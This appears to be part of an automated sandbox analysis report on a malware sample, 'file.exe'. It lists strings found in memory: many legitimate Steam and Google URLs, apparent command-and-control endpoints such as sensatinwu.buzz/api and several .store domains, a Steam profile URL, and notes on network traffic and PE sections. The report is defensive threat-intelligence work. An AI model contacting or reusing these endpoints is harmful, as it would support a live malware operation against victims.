    Source: file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
    Source: file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
    Source: file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
    Source: file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sK
    Source: file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
    Source: file.exe, 00000000.00000003.1812874348.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: file.exe, 00000000.00000003.1812874348.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: file.exe, 00000000.00000003.1812874348.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: file.exe, 00000000.00000003.1812874348.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2R
    Source: file.exe, 00000000.00000003.1812874348.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=AeTz
    Source: file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
    Source: file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
    Source: file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
    Source: file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
    Source: file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
    Source: file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
    Source: file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
    Source: file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=9yzMGndrVfY4&l=e
    Source: file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
    Source: file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
    Source: file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
    Source: file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
    Source: file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
    Source: file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
    Source: file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: file.exe, 00000000.00000003.1813045734.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1815851267.0000000000F9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eaglepawnoy.store:443/apij
    Source: file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
    Source: file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
    Source: file.exe, 00000000.00000003.1813045734.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1815851267.0000000000F9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://licendfilteo.site:443/api
    Source: file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
    Source: file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
    Source: file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
    Source: file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
    Source: file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
    Source: file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
    Source: file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
    Source: file.exe, 00000000.00000003.1812736354.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813197895.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812874348.0000000000FB6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816020866.0000000000FB6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816020866.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sensatinwu.buzz/
    Source: file.exe, 00000000.00000003.1813045734.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813197895.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1815851267.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816020866.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sensatinwu.buzz/api
    Source: file.exe, 00000000.00000003.1812736354.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813197895.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816020866.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sensatinwu.buzz/api(Q
    Source: file.exe, 00000000.00000003.1812736354.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813197895.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816020866.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sensatinwu.buzz/pi
    Source: file.exe, 00000000.00000003.1813045734.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1815851267.0000000000F9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sensatinwu.buzz:443/apibcryptPrimitives.dll(
    Source: file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
    Source: file.exe, 00000000.00000003.1813045734.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1815851267.0000000000F9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spirittunek.store:443/api
    Source: file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
    Source: file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
    Source: file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
    Source: file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
    Source: file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: file.exe, 00000000.00000003.1812874348.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812846129.000000000103E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: file.exe, 00000000.00000003.1812874348.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: file.exe, 00000000.00000003.1812874348.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: file.exe, 00000000.00000003.1813045734.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1815851267.0000000000F9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
    Source: file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
    Source: file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/Z
    Source: file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: file.exe, 00000000.00000003.1812874348.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812846129.000000000103E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000000.00000003.1813045734.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1815851267.0000000000F9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://studennotediw.store:443/apiI
    Source: file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
    Source: file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
    Source: file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
    Source: file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
    Source: file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2

    System Summary

    barindex
    PE file contains section with special chars
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name:
